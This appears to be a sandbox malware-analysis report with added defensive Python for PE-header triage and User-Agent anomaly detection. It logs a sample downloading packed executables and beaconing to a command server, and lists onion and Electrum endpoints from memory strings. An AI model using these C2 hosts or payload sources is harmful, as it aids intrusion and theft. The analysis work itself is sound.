        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp; String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp; String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp; String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not
supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Nov 2021 12:12:39 GMTContent-Type: application/octet-streamContent-Length: 3788288Connection: keep-alivecontent-disposition: attachment; filename=app.exeetag: "616ea4c2-39ce00"last-modified: Tue, 19 Oct 2021 10:58:10 GMTCache-Control: max-age=3600CF-Cache-Status: HITAge: 726Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aGUDRkZW12WFb0Z1WtbDazJRsyQjmf37XuogvaYwPWl6MnjPMl4eqYDp2G4rixUdVCHSJNAij3d%2BJyafZy7nG%2FpPEkNqHIpND7MIWu%2Fkz1fTe%2FgV6DrKP1Wv8esq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 6a8dc077cd066933-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 24 8a 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 d0 39 00 00 10 00 00 00 30 52 00 20 08 8c 00 00 40 52 00 00 10 8c 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 20 8c 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 8c 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 
50 58 30 00 00 00 00 00 30 52 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 d0 39 00 00 40 52 00 00 ca 39 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 10 8c 00 00 02 00 00 00 cc 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$90R @R@ UPX00RUPX19@R9@UPX29@
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Nov 2021 12:13:29 GMTContent-Type: application/octet-streamContent-Length: 2102272Connection: keep-alivecontent-disposition: attachment; filename=watchdog.exeetag: "616ea494-201400"last-modified: Tue, 19 Oct 2021 10:57:24 GMTCache-Control: max-age=3600CF-Cache-Status: HITAge: 802Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yf%2BGD8l7373ZeZ%2Bx2Q1xpl%2FgZXFhtKWeXRYuOa7bn%2FvVZo559VS4xe2flpcsnosSzS0Rx9wZavPEonRFgpdfi6r8EDDYvPMTxUa18GxPfvjXzcqZC%2B2iZbRyMbg4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 6a8dc1b08ff06913-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M
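The two downloads above (app.exe, 3788288 bytes, and watchdog.exe, 2102272 bytes) are served as application/octet-stream and both begin with an MZ/PE header whose three sections are named UPX0, UPX1 and UPX2, i.e. both are UPX-packed PE32 images. The "Data Raw" field prints enough of each body to parse the headers without the file. The following is an added example, not Joe Sandbox code: it parses the first 264 bytes of the app.exe body exactly as printed above (DOS header through the import directory entry), and, because the printed dump is split and hard to copy reliably past that point, rebuilds the remainder of the 496-byte header with struct.pack from the section values the report prints (UPX0 0x523000 virtual bytes with no file data, UPX1 compressed code, UPX2 imports). Everything else, field offsets included, is the standard PE32 layout. Note that the last section's raw end, 0x39ce00, equals the Content-Length 3788288 and the hex tail of the etag, so the section table accounts for the whole body with no overlay appended.

```python
"""Parse the PE header bytes that a sandbox prints in its "Data Raw" field and
pull out what a triager wants: architecture, entry point, section layout,
packer tells and missing hardening flags.

Added example for this report, not Joe Sandbox code. The only input it needs
is the hex text of the Data Raw field (bytes.fromhex ignores the spaces)."""
import struct

# First 264 bytes of the app.exe body exactly as printed in the report's
# Data Raw field: DOS header, PE signature, COFF header and the optional
# header up to and including the import directory entry.
APP_EXE_HEAD = bytes.fromhex(
    "4d5a90000300040000000000ffff0000" "8b000000000000004000000000000000"
    "00000000000000000000000000000000" "00000000000000000000000080000000"
    "0e1fba0e00b409cd21b8014ccd215468" "69732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f5320" "6d6f64652e0d0d0a2400000000000000"
    "504500004c0103000000000000248a00" "00000000e00003030b01030000d03900"
    "001000000030520020088c0000405200" "00108c00000040000010000000020000"
    "06000100010000000600010000000000" "00208c00001000000000000002000000"
    "00001000001000000000100000100000" "00000000100000000000000000000000"
    "00108c0088000000"
)

def section_header(name, vsize, va, raw_size, raw_ptr, chars):
    """Build one 40-byte IMAGE_SECTION_HEADER (relocation/line-number fields zero)."""
    return struct.pack("<8sIIIIIIHHI", name, vsize, va, raw_size, raw_ptr, 0, 0, 0, 0, chars)

# Remainder of the 496-byte header, rebuilt here (constructed, not copied) from the
# section values the report prints after the 14 zeroed data directories.
APP_EXE_FULL = (
    APP_EXE_HEAD + b"\0" * (14 * 8)
    + section_header(b"UPX0", 0x523000, 0x1000, 0, 0x200, 0xE0000080)
    + section_header(b"UPX1", 0x39D000, 0x524000, 0x39CA00, 0x200, 0xE0000040)
    + section_header(b"UPX2", 0x1000, 0x8C1000, 0x200, 0x39CC00, 0xC0000040)
)

def parse_pe_header(data: bytes) -> dict:
    """PE32 header parser; sections are included only as far as the bytes reach."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) optional headers are handled here")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    size_of_image, _, _, subsystem, dll_chars = struct.unpack_from("<IIIHH", data, opt + 56)
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i)
            for i in range(min(n_dirs, 16)) if opt + 104 + 8 * i <= len(data)]
    sections = []
    for i in range(nsect):
        off = opt + opt_size + 40 * i
        if off + 40 > len(data):
            break                                  # dump was cut before this entry
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "va": va, "raw_size": raw_size, "raw_ptr": raw_ptr,
                         "chars": struct.unpack_from("<I", data, off + 36)[0]})
    return {"machine": machine, "n_sections": nsect, "entry": entry, "image_base": image_base,
            "size_of_image": size_of_image, "subsystem": subsystem, "dll_chars": dll_chars,
            "import_dir": dirs[1] if len(dirs) > 1 else None, "sections": sections}

def raw_extent(hdr: dict) -> int:
    """Highest file offset the section table covers (compare with Content-Length)."""
    return max((s["raw_ptr"] + s["raw_size"] for s in hdr["sections"]), default=0)

def triage_findings(hdr: dict) -> list:
    """Packer and hardening tells, one sentence each."""
    out, secs = [], hdr["sections"]
    if any(s["name"].startswith("UPX") for s in secs):
        out.append("section names " + "/".join(s["name"] for s in secs))
    if secs and secs[0]["raw_size"] == 0 and secs[0]["vsize"]:
        out.append(f"{secs[0]['name']} has no file data but {secs[0]['vsize']:#x} virtual bytes (unpack target)")
    for s in secs[1:]:                             # the UPX stub sits at the tail of the compressed section
        if s["va"] <= hdr["entry"] < s["va"] + s["vsize"] and hdr["entry"] >= s["va"] + s["vsize"] * 9 // 10:
            out.append(f"entry point {hdr['entry']:#x} is in the last tenth of {s['name']}")
    if not hdr["dll_chars"] & 0x0040:
        out.append("no DYNAMIC_BASE: image loads at its fixed base, no ASLR")
    if not hdr["dll_chars"] & 0x0100:
        out.append("no NX_COMPAT")
    return out

if __name__ == "__main__":
    for label, blob in (("report head", APP_EXE_HEAD), ("rebuilt header", APP_EXE_FULL)):
        hdr = parse_pe_header(blob)
        print(f"{label}: machine={hdr['machine']:#x} entry={hdr['entry']:#x} "
              f"sections={[s['name'] for s in hdr['sections']]} raw_extent={raw_extent(hdr)}")
        for finding in triage_findings(hdr):
            print("  -", finding)
```

Feed any other "Data Raw" dump in with bytes.fromhex(text) and the parser reports as much as the dump reaches; the 264-byte head alone already yields the i386 machine type, the 0x8c0820 entry point, the 0x400000 image base and a DllCharacteristics of 0 (no ASLR or DEP opt-in), while the section table is needed for the UPX tells.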
        Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server2.trumops.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0Content-Length: 640Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server2.trumops.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36Content-Length: 660Accept-Encoding: gzip
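The two POSTs above go from the same sandbox VM to the same host and path, /api/poll on server2.trumops.com, thirty seconds apart, yet the first claims Firefox 73 on Windows and the second Chrome 80 on macOS. One machine does not change operating system between polls; this is consistent with a client picking its User-Agent at random from an embedded list, which fits the crawler and browser User-Agent strings found in upd.exe and csrss.exe further down. That inconsistency is a usable detection on proxy or TLS-inspection logs. The code below is an added example, not code from the report or the sample: it reads a constructed proxy log whose first two lines restate the report's requests (the remaining lines are benign filler), maps each User-Agent to the platform it claims, and raises an alert when one client presents two platforms to the same host inside a time window. The log format, the platform markers and the ten-minute window are this example's own choices.

```python
"""Flag a client whose User-Agent claims different operating systems to the
same server within a short window, as the two /api/poll requests do.
Added example, not code from the report or the sample."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed proxy log, format: time|source ip|method|host|path|user agent.
# Lines 1-2 and 7 restate the report's /api/poll requests; the rest is benign filler.
PROXY_LOG = """\
2021-11-04T12:12:50|10.0.0.5|POST|server2.trumops.com|/api/poll|Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
2021-11-04T12:13:20|10.0.0.5|POST|server2.trumops.com|/api/poll|Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
2021-11-04T12:13:25|10.0.0.9|GET|www.example.com|/|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
2021-11-04T12:14:00|10.0.0.9|GET|www.example.com|/news|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
2021-11-04T12:14:10|10.0.0.12|GET|www.example.com|/|Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15
2021-11-04T12:14:30|10.0.0.5|GET|www.example.com|/|curl/7.79.1
2021-11-04T13:30:00|10.0.0.5|POST|server2.trumops.com|/api/poll|Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
"""

# Order matters: Android User-Agents also contain "Linux".
PLATFORM_MARKERS = (("Android", "android"), ("iPhone", "ios"), ("iPad", "ios"),
                    ("Windows NT", "windows"), ("Macintosh", "macos"),
                    ("Linux", "linux"), ("X11", "linux"))

def platform_of(user_agent):
    """Operating system a User-Agent claims, or "unknown" for tools that claim none."""
    for marker, name in PLATFORM_MARKERS:
        if marker in user_agent:
            return name
    return "unknown"

def parse_log(text):
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, src, method, host, path, ua = line.split("|", 5)
            events.append({"ts": datetime.fromisoformat(ts), "src": src, "method": method,
                           "host": host, "path": path, "ua": ua})
    return events

def find_platform_flips(events, window=timedelta(minutes=10)):
    """One alert per request whose claimed OS differs from another request the
    same client sent to the same host inside the window. Requests with no OS
    claim (curl and the like) neither trigger nor count as evidence."""
    alerts, recent = [], defaultdict(list)        # (src, host) -> [(ts, platform, ua)]
    for ev in sorted(events, key=lambda e: e["ts"]):
        platform = platform_of(ev["ua"])
        if platform == "unknown":
            continue
        key = (ev["src"], ev["host"])
        recent[key] = [r for r in recent[key] if ev["ts"] - r[0] <= window]
        earlier = sorted({p for _, p, _ in recent[key] if p != platform})
        if earlier:
            alerts.append({"src": ev["src"], "host": ev["host"], "path": ev["path"],
                           "at": ev["ts"], "platforms": earlier + [platform],
                           "evidence": [ua for _, _, ua in recent[key]] + [ev["ua"]]})
        recent[key].append((ev["ts"], platform, ev["ua"]))
    return alerts

if __name__ == "__main__":
    for alert in find_platform_flips(parse_log(PROXY_LOG)):
        print(f"{alert['at']} {alert['src']} -> {alert['host']}{alert['path']} claimed {alert['platforms']}")
        for ua in alert["evidence"]:
            print("    ", ua)
```

With the default ten-minute window only the Windows-then-macOS pair fires; the Linux poll at 13:30 is too far from the others and stays quiet until the window is widened, which is the knob to tune against the beacon interval you expect. Keying on (client, host) rather than on the client alone keeps a user who runs a Mac VM beside a Windows browser from tripping it on unrelated sites.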
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Nov 2021 12:13:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11CF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Ub0PA9Fmqq7OZHOTnOGcBRJwBnYj5ryxvyzrx6FOHxWcZzcHyVWiVfUPaGejltXTD%2F6SRqhh%2Br%2FCIFY9JbyleDFHvMUOkdoo5Awj3PJCVy9rH9NMnIkhsde%2BuCf1%2BDnWMfdu2Yl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a8dc126190b7037-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Nov 2021 12:13:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=jp6rg8da1hqqg23tjramjvmq4d; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VULNO5Jg3NJ174F0kG6Gst68KUn7qITHMZj2A7IY4Nz0a1rfozYrXWuoYRMg%2FxRYwvjKeu5aorLZfTsqKFJnH5%2B410dszzmqHyXdOL7bIrl%2BSVbGW2OHUGkkeU93qYeHI6CXQle4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a8dc15e7c2f774a-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Nov 2021 12:14:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=cnlc3ums43ob7amk913qjg230o; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K8%2BWwHFzEcC65SRlptMAbLk1ZeMBaUi3xsBQMNzzlQjB5u4QmzHcBSCpMW4bK08piNRaXwWPyWEKl2fynOjutLpjH0glYZ3e22rPHrf252BU1FX1nS%2Bm8MaGSw3sfE8O7dW6RE8S"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a8dc28c88274a67-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
